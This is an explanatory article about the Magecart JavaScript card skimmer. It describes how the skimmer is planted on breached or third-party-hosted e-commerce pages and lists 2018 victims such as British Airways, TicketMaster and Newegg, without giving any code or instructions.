In-brief: Magecart digital skimmer

Magecart is the name that RiskIQ.com Company gave to a bank malware designed to steal credit card details while the credit card is used on an infected e-Commerce web site. Magecart was used in several large incidents that occurred during summer 2018, and in particular in the incident that affected British Airways in late August, where Magecart infected the site's payment system and stole 380,000 bank card details in 2 weeks.

Magecart is a simple and small JavaScript program (less than 20 lines of code) that is silently installed on a web site by the hacker once he or she has managed to break into this web site. It is often put in a general section of the web site (such as the web site page footer) in such way it can monitor the activity of web site visitors all along their visit. And when this visitor enters his bank details (at the end of the ordering process), Magecart sends a copy of all the data entered (credit card number, cardholder's name, card validity date and CVV code) to a remote site controlled by the hacker. This kind of malware is often called a "form grabber" (because it captures all the data entered in the payment form), "formjacking" or even a "digital skimmer". In the bank fraud field, a "skimmer" is traditionally a small hardware device, secretly installed by a hacker on a payment terminal (e. g. a cash dispenser ATM) and that steals credit card details when the card is used in this trapped terminal. The "digital skimmer" acts in the same way, but this time it is software code added to the compromised website, rather than an hardware device.

RiskIQ discovered the first versions of Magecart in 2015. At that time the malware was designed to infect small e-commerce web sites built using software such as Magento, PrestaShop or OpenCart. But in July 2018, RiskIQ discovered that Magecart has evolved into a much larger threat, when analysing a Magecart attack targeting TicketMaster (an international ticket sale company) that occured from February to June 2018 system, and affected at least 40,000 customers in UK. At that time, RiskIQ found that Magecart was not directly installed on TicketMaster website, but rather on the servers of a supplier of TicketMaster, named Inbenta.com. Inbenta provides its customers (including TicketMaster) chat-bots services, and when you visit the TicketMaster web site, a part of the code executed is actually hosted on Inbenta servers. This is on these Inbenta servers that the Magecart skimmer was actually installed by the hacker. In its study published in early July 2018, RiskIQ shows that this is not an isolated case and it has identified other web service providers, similar to Inbenta, that have also been compromised by Magecart. It cites in particular the following companies: SociaPlus, PushAssist, Annex Cloud (3 companies specializing in web audience and marketing), and Clarity Connect (a hosting service for e-commerce sites).

RiskIQ estimates that these incidents have affected more than 800 e-commerce sites worldwide, making Magecart the most powerful attacker group in the field of credit card data theft. This shows that Magecart is able to perform direct attacks against large e-commerce web sites (such as British Airways), but also complex attacks infecting third-party web services and remaining undetected for several months. 

Here is a (provisional) list of the recent Magecart victims:

• TicketMaster: Magecart indirect attack through the services provided by the Inbenta Company. 40,000 victims declared, for an attack lasting from February to June 2018. See this RiskIQ analysis.
• British Airways: direct attack on the airline's web site (breached through a yet unknown vector). 380,000 victims for a 15-day attack (August 21 to September 5, 2018). See this RiskIQ analysis.
• Newegg.com: Direct attack on this US site selling computer equipment. The attack lasted from August 14 to September 18, 2018. See this RiskIQ analysis.
• A series of small companies also reported in September 2018 that they had been attacked through the services provided by Annex Cloud: Stein Mart, Title Nine, Plant Therapy and Peaceful Valley Farm Supply (see this Tweeter message which lists these victims).